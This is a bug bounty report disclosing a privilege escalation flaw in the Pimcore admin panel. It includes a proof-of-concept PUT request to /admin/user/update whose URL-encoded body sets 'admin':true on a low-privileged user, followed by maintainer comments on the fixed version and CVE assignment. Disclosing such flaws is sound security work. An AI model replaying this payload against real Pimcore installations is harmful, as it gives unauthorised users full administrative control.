privilege escalation with least config in pimcore/pimcore
Valid
Reported on
May 9th 2023
Description
User can privilege escalation to admin role which least config
Proof of Concept
login in https://11.x-dev.pimcore.fun/admin/
and add a new users in settings -> users with have access Permissions - users
after that login in a new user and come settings - users - new user
update new rule with follow payload with id is a id of new user:
in api PUT /admin/user/update
id=6&data=%7B%22displayfield-1186-inputEl%22%3A6%2C%22displayfield-1187-inputEl%22%3A%22%22%2C%22active%22%3Atrue%2C%22password%22%3A%22%22%2C%222fa_required%22%3Afalse%2C%22firstname%22%3A%22%22%2C%22lastname%22%3A%22%22%2C%22email%22%3A%22%22%2C%22language%22%3A%22en%22%2C%22roles%22%3A%5B%5D%2C%22perspectives%22%3A%5B%22%22%5D%2C%22welcomescreen%22%3Afalse%2C%22memorizeTabs%22%3Atrue%2C%22allowDirtyClose%22%3Afalse%2C%22closeWarning%22%3Afalse%2C%22admin%22%3Atrue%2C%22displayfield-1210-inputEl%22%3A%22Admin%20users%20do%20not%20only%20automatically%20gain%20all%20permissions%20listed%20below%2C%20they%20are%20also%20allowed%20to%20perform%20all%20actions%20on%20documents%2C%20assets%20and%20objects%20without%20any%20restrictions.%22%2C%22permission_admin_translations%22%3Atrue%2C%22permission_gdpr_data_extractor%22%3Atrue%2C%22permission_system_appearance_settings%22%3Atrue%2C%22permission_application_logging%22%3Atrue%2C%22permission_asset_metadata%22%3Atrue%2C%22permission_assets%22%3Atrue%2C%22permission_bundle_ecommerce_back-office_order%22%3Atrue%2C%22permission_classes%22%3Atrue%2C%22permission_clear_cache%22%3Atrue%2C%22permission_clear_fullpage_cache%22%3Atrue%2C%22permission_clear_temp_files%22%3Atrue%2C%22permission_plugin_cmf_perm_activityview%22%3Atrue%2C%22permission_plugin_cmf_perm_customer_automation_rules%22%3Atrue%2C%22permission_plugin_cmf_perm_customerview_admin%22%3Atrue%2C%22permission_plugin_cmf_perm_customerview%22%3Atrue%2C%22permission_plugin_cmf_perm_newsletter_enqueue_all_customers%22%3Atrue%2C%22permission_dashboards%22%3Atrue%2C%22permission_document_types%22%3Atrue%2C%22permission_documents%22%3Atrue%2C%22permission_emails%22%3Atrue%2C%22permission_notes_events%22%3Atrue%2C%22permission_notifications%22%3Atrue%2C%22permission_objects%22%3Atrue%2C%22permission_bundle_outputDataConfigToolkit%22%3Atrue%2C%22permission_piwik_reports%22%3Atrue%2C%22permission_piwik_settings%22%3Atrue%2C%22permission_plugins%22%3Atrue%2C%22permission_predefined_properties%22%3Atrue%2C%22permission_bundle_ecommerce_pricing_rules%22%3Atrue%2C%22permission_qr_codes%22%3Atrue%2C%22permission_recyclebin%22%3Atrue%2C%22permission_redirects%22%3Atrue%2C%22permission_seemode%22%3Atrue%2C%22permission_notifications_send%22%3Atrue%2C%22permission_share_configurations%22%3Atrue%2C%22permission_system_settings%22%3Atrue%2C%22permission_tag_snippet_management%22%3Atrue%2C%22permission_tags_assignment%22%3Atrue%2C%22permission_tags_configuration%22%3Atrue%2C%22permission_tags_search%22%3Atrue%2C%22permission_thumbnails%22%3Atrue%2C%22permission_translations%22%3Atrue%2C%22permission_users%22%3Atrue%2C%22permission_web2print_web2print_favourite_output_channels%22%3Atrue%2C%22permission_website_settings%22%3Atrue%2C%22permission_workflow_details%22%3Atrue%2C%22permission_glossary%22%3Atrue%2C%22permission_google_marketing%22%3Atrue%2C%22permission_http_errors%22%3Atrue%2C%22permission_robots.txt%22%3Atrue%2C%22permission_seo_document_editor%22%3Atrue%2C%22permission_newsletter%22%3Atrue%2C%22permission_plugin_datahub_adapter_graphql%22%3Atrue%2C%22permission_plugin_datahub_admin%22%3Atrue%2C%22permission_plugin_datahub_config%22%3Atrue%2C%22permission_reports%22%3Atrue%2C%22permission_reports_config%22%3Atrue%2C%22permission_routes%22%3Atrue%2C%22permission_targeting%22%3Atrue%2C%22permission_web2print_settings%22%3Atrue%2C%22permission_word_export%22%3Atrue%2C%22permission_xliff_import_export%22%3Atrue%2C%22docTypes%22%3A%5B%5D%2C%22classes%22%3A%5B%5D%2C%22contentLanguages%22%3A%5B%22en%22%2C%22de%22%2C%22fr%22%5D%2C%22websiteTranslationLanguagesEdit%22%3A%5B%5D%2C%22websiteTranslationLanguagesView%22%3A%5B%5D%7D&workspaces=%7B%22asset%22%3A%5B%5D%2C%22object%22%3A%5B%5D%2C%22document%22%3A%5B%5D%7D&keyBindings=%7B%22save%22%3A%22%7B%5C%22key%5C%22%3A83%2C%5C%22action%5C%22%3A%5C%22save%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22publish%22%3A%22%7B%5C%22key%5C%22%3A80%2C%5C%22action%5C%22%3A%5C%22publish%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22unpublish%22%3A%22%7B%5C%22key%5C%22%3A85%2C%5C%22action%5C%22%3A%5C%22unpublish%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22rename%22%3A%22%7B%5C%22key%5C%22%3A82%2C%5C%22action%5C%22%3A%5C%22rename%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%7D%22%2C%22refresh%22%3A%22%7B%5C%22key%5C%22%3A116%2C%5C%22action%5C%22%3A%5C%22refresh%5C%22%2C%5C%22alt%5C%22%3Afalse%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22openDocument%22%3A%22%7B%5C%22key%5C%22%3A68%2C%5C%22action%5C%22%3A%5C%22openDocument%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22openAsset%22%3A%22%7B%5C%22key%5C%22%3A65%2C%5C%22action%5C%22%3A%5C%22openAsset%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22openObject%22%3A%22%7B%5C%22key%5C%22%3A79%2C%5C%22action%5C%22%3A%5C%22openObject%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22openClassEditor%22%3A%22%7B%5C%22key%5C%22%3A67%2C%5C%22action%5C%22%3A%5C%22openClassEditor%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22openInTree%22%3A%22%7B%5C%22key%5C%22%3A76%2C%5C%22action%5C%22%3A%5C%22openInTree%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%2C%22showMetaInfo%22%3A%22%7B%5C%22key%5C%22%3A73%2C%5C%22action%5C%22%3A%5C%22showMetaInfo%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22searchDocument%22%3A%22%7B%5C%22key%5C%22%3A87%2C%5C%22action%5C%22%3A%5C%22searchDocument%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22searchAsset%22%3A%22%7B%5C%22key%5C%22%3A65%2C%5C%22action%5C%22%3A%5C%22searchAsset%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22searchObject%22%3A%22%7B%5C%22key%5C%22%3A79%2C%5C%22action%5C%22%3A%5C%22searchObject%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22showElementHistory%22%3A%22%7B%5C%22key%5C%22%3A72%2C%5C%22action%5C%22%3A%5C%22showElementHistory%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22closeAllTabs%22%3A%22%7B%5C%22key%5C%22%3A84%2C%5C%22action%5C%22%3A%5C%22closeAllTabs%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22searchAndReplaceAssignments%22%3A%22%7B%5C%22key%5C%22%3A83%2C%5C%22action%5C%22%3A%5C%22searchAndReplaceAssignments%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22redirects%22%3A%22%7B%5C%22key%5C%22%3A82%2C%5C%22action%5C%22%3A%5C%22redirects%5C%22%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22sharedTranslations%22%3A%22%7B%5C%22key%5C%22%3A84%2C%5C%22action%5C%22%3A%5C%22sharedTranslations%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22recycleBin%22%3A%22%7B%5C%22key%5C%22%3A82%2C%5C%22action%5C%22%3A%5C%22recycleBin%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22notesEvents%22%3A%22%7B%5C%22key%5C%22%3A78%2C%5C%22action%5C%22%3A%5C%22notesEvents%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22tagManager%22%3A%22%7B%5C%22key%5C%22%3A72%2C%5C%22action%5C%22%3A%5C%22tagManager%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22tagConfiguration%22%3A%22%7B%5C%22key%5C%22%3A78%2C%5C%22action%5C%22%3A%5C%22tagConfiguration%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22users%22%3A%22%7B%5C%22key%5C%22%3A85%2C%5C%22action%5C%22%3A%5C%22users%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22roles%22%3A%22%7B%5C%22key%5C%22%3A80%2C%5C%22action%5C%22%3A%5C%22roles%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22clearAllCaches%22%3A%22%7B%5C%22key%5C%22%3A81%2C%5C%22action%5C%22%3A%5C%22clearAllCaches%5C%22%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22clearDataCache%22%3A%22%7B%5C%22key%5C%22%3A67%2C%5C%22action%5C%22%3A%5C%22clearDataCache%5C%22%2C%5C%22ctrl%5C%22%3Afalse%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22customReports%22%3A%22%7B%5C%22key%5C%22%3A67%2C%5C%22action%5C%22%3A%5C%22customReports%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22reports%22%3A%22%7B%5C%22key%5C%22%3A77%2C%5C%22action%5C%22%3A%5C%22reports%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22applicationLogger%22%3A%22%7B%5C%22key%5C%22%3A76%2C%5C%22action%5C%22%3A%5C%22applicationLogger%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22glossary%22%3A%22%7B%5C%22key%5C%22%3A71%2C%5C%22action%5C%22%3A%5C%22glossary%5C%22%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22ctrl%5C%22%3Afalse%7D%22%2C%22seoDocumentEditor%22%3A%22%7B%5C%22key%5C%22%3A83%2C%5C%22action%5C%22%3A%5C%22seoDocumentEditor%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22robots%22%3A%22%7B%5C%22key%5C%22%3A74%2C%5C%22action%5C%22%3A%5C%22robots%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22httpErrorLog%22%3A%22%7B%5C%22key%5C%22%3A79%2C%5C%22action%5C%22%3A%5C%22httpErrorLog%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22alt%5C%22%3Atrue%2C%5C%22shift%5C%22%3Afalse%7D%22%2C%22quickSearch%22%3A%22%7B%5C%22key%5C%22%3A70%2C%5C%22action%5C%22%3A%5C%22quickSearch%5C%22%2C%5C%22ctrl%5C%22%3Atrue%2C%5C%22shift%5C%22%3Atrue%2C%5C%22alt%5C%22%3Afalse%7D%22%7D
key reason is admin has set true in request 22admin%22%3Atrue%2C
Impact
a new user can privilege escalation admin with least config
We are processing your report and will contact the
pimcore
team within 24 hours.
7 months ago
duyhm1995 modified the report
7 months ago
We have contacted a member of the
pimcore
team and are waiting to hear back
7 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
Divesh Pahuja
commented
6 months ago
Hi @duyhm1995 please change the affected version to 10.5.22 as the issue was fixed in 10.5.23. thanks!
Hi @dvesh3 edit feature had disable in this report i can't update them
Divesh Pahuja
commented
6 months ago
@admin can you please help in updating the affected version to 10.5.22 here? thanks!
Divesh Pahuja
commented
6 months ago
@benharvie sorry one more thing, the package also needs to be changed to pimcore/pimcore
Divesh Pahuja
commented
6 months ago
@admin can you please update the repository to pimcore/pimcore?
The fix bounty has been dropped
This vulnerability has been assigned a CVE
to join this conversation